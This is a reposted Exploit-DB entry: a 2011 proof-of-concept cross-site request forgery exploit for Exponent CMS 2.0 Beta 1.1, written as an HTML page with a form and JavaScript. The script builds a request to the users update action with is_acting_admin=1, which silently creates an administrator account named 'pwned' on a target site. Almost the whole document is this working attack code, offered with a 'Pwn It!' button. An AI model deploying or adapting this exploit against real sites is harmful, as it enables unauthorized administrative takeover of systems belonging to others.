Exponent CMS 2.0 Beta 1.1 – Cross-Site Request Forgery (Add Administrator Account) - 体验盒子

作者： outlaw.dll
日期： 2011-05-02
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/17235/
<!--
 
[+] Title: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC
[+] Version: 2.0 Beta 1.1 (not tested with older versions)
[+] Note: No need administrator to be logged (:
[+] Tested on: Linux Ubuntu 11.04 (Google Chrome) but will work in any other OS
[+] Download URL: https://github.com/downloads/exponentcms/exponent-cms/exponent-2.0.0-beta1.1.zip
[+] Date: 02.05.2011
[+] Author: outlaw.dll

GreetZ to all bitcheZ in the world! =P
W_o.O_W
 
-->
<html>
<head>
<title>Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll</title>
<style type="text/css">
body, table, tr, td 
{
background-color: #00489C;
font-family: Verdana;
font-size: 16px;
color: #FFFFFF;
}
</style>
</head>
<body>
<pre>
.-""""-. .-""""-. 
 /\ /\
/__\ /__\
 // \/ \\ // \/ \\
 |\__\/__/| |\__\/__/|
\||/ \||/
 \/ \/
\__/ \__/
.-""""-. '.__.'.-""""-. '.__.'.-""""-.
 /\ ||/\ ||/\
/__\|/__\|/__\
 // \/ \\ // \/ \\ // \/ \\
 |\__\/__/| |\__\/__/| |\__\/__/|
\||/ \||/ \||/
 \/ \/ \/
\__/ \__/ \__/
 '.__.' '.__.' '.__.'
|| || ||
|| || ||
</pre>
Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll
<br /><br />
<form name="exploit">
<table border="0">
<tr>
<td width="150" align="right">Target URL:</td>
<td width="400"><input type="text" name="targetURL" value="http://localhost/exponent/index.php" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">Username:</td>
<td width="400"><input type="text" name="username" value="pwned" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">Password:</td>
<td width="400"><input type="text" name="password" value="1337" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">E-M@il:</td>
<td width="400"><input type="text" name="email" value="root@pwned.cx" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">First Name:</td>
<td width="400"><input type="text" name="firstname" value="Greatest" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">Last Name:</td>
<td width="400"><input type="text" name="lastname" value="Ever" size="30" /></td>
</tr>
<tr>
<td width="150" align="right">Admin Permissions:</td>
<td width="400"><input type="checkbox" name="isAdmin" checked="yes" value="1" /></td>
</tr>
<tr>
<td width="150"></td>
<td width="400"><input type="button" value="Pwn It!" onClick="runExploit()" /></td>
</tr>
</table>
</form>
<script type="text/javascript">
function runExploit()
{
var targetURL = exploit.targetURL.value;
var username = exploit.username.value;
var password = exploit.password.value;
var email = exploit.email.value;
var firstname = exploit.firstname.value;
var lastname = exploit.lastname.value;
var isAdmin = exploit.isAdmin.value;

if (targetURL != "" && username != "" && password != "" && email != "" && firstname != "" && lastname != "" && isAdmin != "")
{
var exploitURL = targetURL + "?module=users&action=update&username="+username+"&pass1="+password+"&pass2="+password+"&email="+email+"&firstname="+firstname+"&lastname="+lastname+"&is_acting_admin="+isAdmin;
location.replace(exploitURL);
}
else
{
alert("Error! Empty form fields.");
}
}
</script>
</body>
</html>